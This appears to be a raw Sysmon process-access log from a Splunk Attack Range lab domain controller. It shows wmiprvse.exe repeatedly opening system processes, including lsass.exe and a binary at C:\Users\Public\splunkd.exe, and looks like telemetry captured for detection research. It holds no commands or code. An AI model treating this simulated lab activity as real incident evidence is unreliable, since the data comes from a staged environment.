16:00:02.021{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2900-00000000A301}2792C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028339Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:02.021{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2800-00000000A301}2544C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028338Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:02.021{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4990-6008-2600-00000000A301}3044C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028337Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:02.021{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2400-00000000A301}2932C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028336Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:02.021{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2300-00000000A301}2924C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028335Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:02.021{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4988-6008-2000-00000000A301}2388C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028334Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:02.021{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1700-00000000A301}1656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028333Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:02.021{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028332Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:02.021{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028331Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:02.021{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1400-00000000A301}1280C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028330Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:02.021{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1300-00000000A301}1264C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028329Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:02.021{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1200-00000000A301}1176C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028328Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:02.021{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1100-00000000A301}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028327Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:02.021{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028326Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:02.021{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0F00-00000000A301}1112C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028325Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:02.021{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028324Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:02.021{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0D00-00000000A301}996C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028323Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:02.006{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028322Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:02.006{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028321Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:02.006{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4984-6008-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028526Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 